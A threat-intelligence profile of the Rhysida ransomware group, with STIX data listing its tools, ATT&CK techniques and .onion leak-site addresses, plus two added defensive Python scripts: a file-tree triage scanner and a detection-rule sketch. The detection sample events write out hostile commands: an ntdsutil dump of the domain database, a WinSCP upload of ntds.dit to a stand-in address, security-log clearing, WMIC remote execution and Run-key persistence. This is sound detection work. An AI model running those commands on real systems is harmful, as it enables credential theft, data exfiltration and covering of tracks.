Threat Actor Profile
Description
Rhysida is a ransomware-as-a-service (RaaS) group that emerged in May 2023. It gains initial access through phishing, uses Cobalt Strike for post-exploitation inside the victim network, and then deploys its namesake ransomware. The group runs a double-extortion model: data exfiltrated before encryption is published on its leak site if the ransom is not paid. At the time of the source write-up, Rhysida was still in the early stages of development. The ransomware drops PDF ransom notes in the affected folders, instructing victims to contact the group through its Tor portal and pay in Bitcoin, and appends the extension '.rhysida' to each file it encrypts. Source: https://github.com/crocodyli/ThreatActors-TTPs
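A triage helper that follows from the two on-disk artefacts the description gives: the extension appended to encrypted files and a PDF note dropped per affected folder. This is an added example, not code from the profile or from the source repository. It assumes the encrypted-file extension is '.rhysida' and uses the note filename reported in public advisories (CISA AA23-319A), which this page does not name; any other PDF sitting beside encrypted files is also treated as a candidate note. The directory tree it scans is constructed inside the block.

```python
"""Scope a Rhysida-style encryption run on a file tree (added example).

Reports how many files carry the appended extension, which folders received
a ransom note, which encrypted folders did not, and the mtime spread of the
encrypted files so the run can be lined up against other telemetry.
"""
import json
import os
import tempfile

ENCRYPTED_EXT = ".rhysida"
# Note filename from public advisories (CISA AA23-319A); the profile only says
# "PDF notes", so any other PDF next to encrypted files is also counted.
NOTE_NAME = "CriticalBreachDetected.pdf"


def scope_encryption(root):
    """Walk `root` and return the encryption footprint as plain data."""
    encrypted = []        # (folder relative to root, filename)
    named_notes = set()   # folders holding NOTE_NAME
    other_pdfs = set()    # folders holding any other PDF
    mtimes = []
    for dirpath, _subdirs, files in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        for name in files:
            lower = name.lower()
            if lower.endswith(ENCRYPTED_EXT) and len(name) > len(ENCRYPTED_EXT):
                encrypted.append((rel, name))
                mtimes.append(os.path.getmtime(os.path.join(dirpath, name)))
            elif name == NOTE_NAME:
                named_notes.add(rel)
            elif lower.endswith(".pdf"):
                other_pdfs.add(rel)
    affected = {folder for folder, _ in encrypted}
    note_dirs = named_notes | (other_pdfs & affected)
    return {
        "encrypted_files": len(encrypted),
        # original names recovered by stripping the appended extension
        "originals": sorted(name[: -len(ENCRYPTED_EXT)] for _, name in encrypted),
        "affected_dirs": sorted(affected),
        "note_dirs": sorted(note_dirs),
        # encrypted folders with no note: interrupted run, or a different note name
        "dirs_missing_note": sorted(affected - note_dirs),
        "mtime_window_seconds": (max(mtimes) - min(mtimes)) if mtimes else None,
    }


def build_sample_tree(base):
    """Constructed sample tree: two hit folders (one with a note), one untouched."""
    layout = {
        "finance": ["q1.xlsx" + ENCRYPTED_EXT, "budget.docx" + ENCRYPTED_EXT, NOTE_NAME],
        "hr": ["staff.csv" + ENCRYPTED_EXT, "readme.txt"],
        "public": ["logo.png", "brochure.pdf"],   # untouched folder with an ordinary PDF
    }
    for folder, names in layout.items():
        os.makedirs(os.path.join(base, folder), exist_ok=True)
        for name in names:
            with open(os.path.join(base, folder, name), "wb") as fh:
                fh.write(b"\x00" * 16)


def demo():
    """Build the sample tree in a temp dir and scope it."""
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base)
        return scope_encryption(base)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Point `scope_encryption` at the root of a share rather than a temp tree in a real case; the `dirs_missing_note` list is the part worth reading first, since a folder full of renamed files with no note usually means either an interrupted run or a note name that differs from the one assumed here.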
Confidence Score
Tags
First Seen
Unknown
Last Updated
Unknown
Active Status
Active
Created
April 29, 2026
MITRE ATT&CK Techniques (28)
STIX Data
{'added_date': None,
'client': '2003264@sit.singaporetech.edu.sg',
'description': 'Rhysida is a ransomware-as-a-service (RAAS) group that '
'emerged in May 2023. The group utilizes a namesake ransomware '
'through phishing attacks and Cobalt Strike to breach the '
"targets' networks and deploy their payloads.<br> <br> The "
'group threatens to publicly distribute exfiltrated data if '
"the ransom is not paid, and it's worth mentioning that "
'Rhysida is still in the early stages of development.<br> <br> '
'The ransomware leaves PDF notes in the affected folders, '
'instructing victims to contact the group through its portal, '
'and payment is made via Bitcoin.<br> <br> After encryption, '
"the ransomware appends the extension '.ryshida' to encrypted "
'files.<BR>Source: '
'https://github.com/crocodyli/ThreatActors-TTPs',
'firstseen': '2023-06-05T11:25:22.945172+00:00',
'group': 'rhysida',
'has_negotiations': False,
'has_ransomnote': True,
'lastseen': '2026-04-27T15:35:49.961778+00:00',
'locations': [{'available': True,
'fqdn': 'rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion',
'slug': 'http://rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion/archive.php?auction',
'title': '',
'type': 'DLS'},
{'available': True,
'fqdn': 'rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad.onion',
'slug': 'http://rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad.onion',
'title': 'Rhysida',
'type': 'DLS'}],
'negotiation_count': 0,
'ransomnotes_count': 1,
'tiaras_metadata': {'has_negotiations': False,
'has_ransomnote': True,
'locations': [{'available': True,
'fqdn': 'rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion',
'slug': 'http://rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion/archive.php?auction',
'title': '',
'type': 'DLS'},
{'available': True,
'fqdn': 'rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad.onion',
'slug': 'http://rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad.onion',
'title': 'Rhysida',
'type': 'DLS'}],
'negotiation_count': 0,
'ransomnotes_count': 1,
'ransomware_live_group': 'rhysida',
'tools': {'CredentialTheft': [],
'DefenseEvasion': [],
'DiscoveryEnum': ['PowerView'],
'Exfiltration': ['WinSCP'],
'LOLBAS': ['NTDS Utility (ntdsutil)',
'PsExec',
'Windows Event Utility (wevtutil)',
'WMIC'],
'Networking': [],
'Offsec': ['Impacket'],
'RMM-Tools': ['AnyDesk']},
'url': 'https://www.ransomware.live/group/rhysida',
'victims': 269,
'vulnerabilities': []},
'tiaras_source': 'ransomware.live',
'tools': {'CredentialTheft': [],
'DefenseEvasion': [],
'DiscoveryEnum': ['PowerView'],
'Exfiltration': ['WinSCP'],
'LOLBAS': ['NTDS Utility (ntdsutil)',
'PsExec',
'Windows Event Utility (wevtutil)',
'WMIC'],
'Networking': [],
'Offsec': ['Impacket'],
'RMM-Tools': ['AnyDesk']},
'ttps': [{'tactic_id': 'TA0043',
'tactic_name': 'Reconnaissance',
'techniques': [{'technique_details': 'Scanning for vulnerable '
'targets.',
'technique_id': 'T1595',
'technique_name': 'Active Scanning'},
{'technique_details': 'Gathering information through '
'phishing.',
'technique_id': 'T1598',
'technique_name': 'Phishing for Information'}]},
{'tactic_id': 'TA0042',
'tactic_name': 'Resource Development',
'techniques': [{'technique_details': 'Acquiring infrastructure for '
'operations.',
'technique_id': 'T1583',
'technique_name': 'Acquire Infrastructure'},
{'technique_details': 'Developing malware '
'capabilities.',
'technique_id': 'T1587',
'technique_name': 'Develop Capabilities'}]},
{'tactic_id': 'TA0001',
'tactic_name': 'Initial Access',
'techniques': [{'technique_details': 'Phishing for initial access.',
'technique_id': 'T1566',
'technique_name': 'Phishing'},
{'technique_details': 'Bypassing UAC for access.',
'technique_id': 'T1548.002',
'technique_name': 'Abuse Elevation Control Mechanism: Bypass User Account Control'}]},
{'tactic_id': 'TA0002',
'tactic_name': 'Execution',
'techniques': [{'technique_details': 'Using command interpreters '
'for execution.',
'technique_id': 'T1059',
'technique_name': 'Command and Scripting '
'Interpreter'},
{'technique_details': 'Using shared modules.',
'technique_id': 'T1129',
'technique_name': 'Shared Modules'}]},
{'tactic_id': 'TA0003',
'tactic_name': 'Persistence',
'techniques': [{'technique_details': 'Persistence via registry run '
'keys.',
'technique_id': 'T1547.001',
'technique_name': 'Registry Run Keys / Startup '
'Folder'}]},
{'tactic_id': 'TA0004',
'tactic_name': 'Privilege Escalation',
'techniques': [{'technique_details': 'Injecting into processes for '
'privilege escalation.',
'technique_id': 'T1055',
'technique_name': 'Process Injection'},
{'technique_details': 'Hijacking thread execution.',
'technique_id': 'T1055.003',
'technique_name': 'Thread Execution Hijacking'},
{'technique_details': 'Using registry run keys.',
'technique_id': 'T1547.001',
'technique_name': 'Registry Run Keys / Startup Folder'}]},
{'tactic_id': 'TA0005',
'tactic_name': 'Defense Evasion',
'techniques': [{'technique_details': 'Obfuscating files and '
'information.',
'technique_id': 'T1027',
'technique_name': 'Obfuscated Files or Information'},
{'technique_details': 'Masquerading malicious files.',
'technique_id': 'T1036',
'technique_name': 'Masquerading'},
{'technique_details': 'Process injection for '
'evasion.',
'technique_id': 'T1055',
'technique_name': 'Process Injection'},
{'technique_details': 'Thread execution hijacking.',
'technique_id': 'T1055.003',
'technique_name': 'Thread Execution Hijacking'},
{'technique_details': 'Evading '
'virtualization/sandbox '
'detection.',
'technique_id': 'T1497',
'technique_name': 'Virtualization/Sandbox Evasion'},
{'technique_details': 'Hiding artifacts.',
'technique_id': 'T1564',
'technique_name': 'Hide Artifacts'},
{'technique_details': 'Using NTFS file attributes.',
'technique_id': 'T1564.004',
'technique_name': 'NTFS File Attributes'},
{'technique_details': 'Reflective DLL injection.',
'technique_id': 'T1620',
'technique_name': 'Reflective Code Loading'}]},
{'tactic_id': 'TA0007',
'tactic_name': 'Discovery',
'techniques': [{'technique_details': 'Discovering application '
'windows.',
'technique_id': 'T1010',
'technique_name': 'Application Window Discovery'},
{'technique_details': 'Discovering running '
'processes.',
'technique_id': 'T1057',
'technique_name': 'Process Discovery'},
{'technique_details': 'Discovering system '
'information.',
'technique_id': 'T1082',
'technique_name': 'System Information Discovery'},
{'technique_details': 'Discovering files and '
'directories.',
'technique_id': 'T1083',
'technique_name': 'File and Directory Discovery'},
{'technique_details': 'Detecting '
'virtualization/sandbox.',
'technique_id': 'T1497',
'technique_name': 'Virtualization/Sandbox Evasion'},
{'technique_details': 'Discovering security '
'software.',
'technique_id': 'T1518.001',
'technique_name': 'Security Software Discovery'}]},
{'tactic_id': 'TA0009',
'tactic_name': 'Collection',
'techniques': [{'technique_details': 'Collecting data from local '
'system.',
'technique_id': 'T1005',
'technique_name': 'Data from Local System'},
{'technique_details': 'Automated data collection.',
'technique_id': 'T1119',
'technique_name': 'Automated Collection'}]},
{'tactic_id': 'TA0011',
'tactic_name': 'Command and Control',
'techniques': [{'technique_details': 'Using application layer '
'protocols.',
'technique_id': 'T1071',
'technique_name': 'Application Layer Protocol'},
{'technique_details': 'Using web protocols for C2.',
'technique_id': 'T1071.001',
'technique_name': 'Web Protocols'}]},
{'tactic_id': 'TA0010',
'tactic_name': 'Exfiltration',
'techniques': [{'technique_details': 'Exfiltrating data over C2 '
'channel.',
'technique_id': 'T1041',
'technique_name': 'Exfiltration Over C2 Channel'}]},
{'tactic_id': 'TA0040',
'tactic_name': 'Impact',
'techniques': [{'technique_details': 'Encrypting data for impact.',
'technique_id': 'T1486',
'technique_name': 'Data Encrypted for Impact'}]}],
'url': 'https://www.ransomware.live/group/rhysida',
'victims': 269,
'vulnerabilities': []}
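The tool list and TTP matrix above are the practitioner's starting point for detection. The block below is an added example, not code from the profile or from ransomware.live: it encodes one process-creation rule per tool the profile names (ntdsutil, wevtutil, PsExec, WMIC, Impacket, AnyDesk, WinSCP) plus the registry Run-key persistence from the TTP list, runs them over constructed Sysmon-style events, and then scores each host by how many distinct tools it shows, because any one of them on its own is routine administration. The ATT&CK IDs on the rules are the standard mappings for those tools (several, such as NTDS dumping and log clearing, are not in this profile's own TTP list); hostnames, users, paths and the 203.0.113.10 address are made up.

```python
"""Process-creation detection sketch for the tools in this profile (added example).

Rules run over Sysmon EID 1 / Security 4688 style events; the events here are
constructed. Hosts are then scored on how many distinct rules fired.
"""
import re
from collections import defaultdict


def _base(path):
    """Lower-cased executable name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _img(event, *names):
    return _base(event["image"]) in names


def _cmd(event, pattern):
    return re.search(pattern, event["cmdline"], re.I) is not None


# (rule, ATT&CK technique, predicate): one per tool named in the profile
RULES = [
    ("ntdsutil_ifm_dump", "T1003.003",
     lambda e: _img(e, "ntdsutil.exe") and _cmd(e, r"\bifm\b|\bac\s+i\s+ntds\b")),
    ("wevtutil_clear_log", "T1070.001",
     lambda e: _img(e, "wevtutil.exe") and _cmd(e, r"\b(cl|clear-log)\b")),
    ("psexec_service", "T1569.002",
     lambda e: _img(e, "psexesvc.exe") or _base(e["parent"]) == "psexesvc.exe"),
    ("wmic_remote_exec", "T1047",
     lambda e: _img(e, "wmic.exe") and _cmd(e, r"process\s+call\s+create")),
    # Impacket wmiexec redirects command output to ADMIN$\__<timestamp> on the target
    ("impacket_wmiexec", "T1047",
     lambda e: _img(e, "cmd.exe") and _cmd(e, r"\\\\127\.0\.0\.1\\admin\$\\__")),
    ("anydesk_install", "T1219",
     lambda e: _img(e, "anydesk.exe") and _cmd(e, r"--install\b")),
    ("winscp_transfer", "T1048",
     lambda e: _img(e, "winscp.exe") and _cmd(e, r"\b(sftp|ftps?|scp)://")),
    ("run_key_persistence", "T1547.001",
     lambda e: _img(e, "reg.exe") and _cmd(e, r"\badd\b.*\\currentversion\\run\b")),
]


def detect(events):
    """Return one hit per (event, rule) match, in event order."""
    hits = []
    for e in events:
        for rule, technique, pred in RULES:
            if pred(e):
                hits.append({"ts": e["ts"], "host": e["host"], "user": e["user"],
                             "rule": rule, "technique": technique, "cmdline": e["cmdline"]})
    return hits


def summarise(hits):
    """Per host: distinct rules seen; two or more distinct tools escalates to high."""
    per_host = defaultdict(set)
    for h in hits:
        per_host[h["host"]].add(h["rule"])
    return {host: {"rules": sorted(rules), "severity": "high" if len(rules) >= 2 else "low"}
            for host, rules in per_host.items()}


def _ev(ts, host, user, parent, image, cmdline):
    return {"ts": ts, "host": host, "user": user, "parent": parent, "image": image, "cmdline": cmdline}


# Constructed sample events (not real telemetry); names, paths and the address are illustrative.
SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    _ev("2024-03-01T02:10:05Z", "WS05", "CORP\\jdoe", SYS32 + "explorer.exe", SYS32 + "cmd.exe",
        "cmd.exe /c dir C:\\Users"),                                   # benign
    _ev("2024-03-01T02:12:40Z", "WS05", "CORP\\jdoe", SYS32 + "cmd.exe", SYS32 + "wevtutil.exe",
        "wevtutil.exe qe Security /c:5 /f:text"),                      # query, not clearing
    _ev("2024-03-01T02:15:11Z", "WS05", "CORP\\jdoe", SYS32 + "cmd.exe", "C:\\Users\\jdoe\\Downloads\\AnyDesk.exe",
        "AnyDesk.exe --install \"C:\\Program Files (x86)\\AnyDesk\" --start-with-win --silent"),
    _ev("2024-03-01T02:20:33Z", "WS05", "CORP\\jdoe", SYS32 + "cmd.exe", SYS32 + "wbem\\WMIC.exe",
        "wmic.exe /node:DC01 process call create \"cmd.exe /c whoami\""),
    _ev("2024-03-01T02:31:07Z", "DC01", "CORP\\svc_backup", SYS32 + "wbem\\WmiPrvSE.exe", SYS32 + "cmd.exe",
        "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1709259067.42 2>&1"),
    _ev("2024-03-01T02:33:50Z", "DC01", "CORP\\svc_backup", SYS32 + "cmd.exe", SYS32 + "ntdsutil.exe",
        "ntdsutil.exe \"ac i ntds\" \"ifm\" \"create full C:\\temp\\x\" q q"),
    _ev("2024-03-01T02:36:15Z", "DC01", "CORP\\svc_backup", SYS32 + "services.exe", "C:\\Windows\\PSEXESVC.exe",
        "C:\\Windows\\PSEXESVC.exe"),
    _ev("2024-03-01T02:40:12Z", "DC01", "CORP\\svc_backup", SYS32 + "cmd.exe", "C:\\Tools\\WinSCP.exe",
        "WinSCP.exe /command \"open sftp://u@203.0.113.10/\" \"put C:\\temp\\x\\Active Directory\\ntds.dit\" exit"),
    _ev("2024-03-01T02:45:00Z", "DC01", "CORP\\svc_backup", SYS32 + "cmd.exe", SYS32 + "wevtutil.exe",
        "wevtutil.exe cl Security"),
    _ev("2024-03-01T02:46:20Z", "WS05", "CORP\\jdoe", SYS32 + "cmd.exe", SYS32 + "reg.exe",
        "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\Public\\upd.exe /f"),
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for h in found:
        print(f'{h["ts"]} {h["host"]:5} {h["rule"]:20} {h["technique"]:10} {h["cmdline"][:60]}')
    print(summarise(found))
```

The `wevtutil qe` event is there on purpose: querying the Security log is what a helpdesk does all day, and a rule keyed on the binary name alone would page on it. In a real pipeline the same rules translate one-for-one into KQL over `DeviceProcessEvents` or Sysmon EID 1, with `summarise` becoming a `summarize dcount(rule) by DeviceName` over the hunting window.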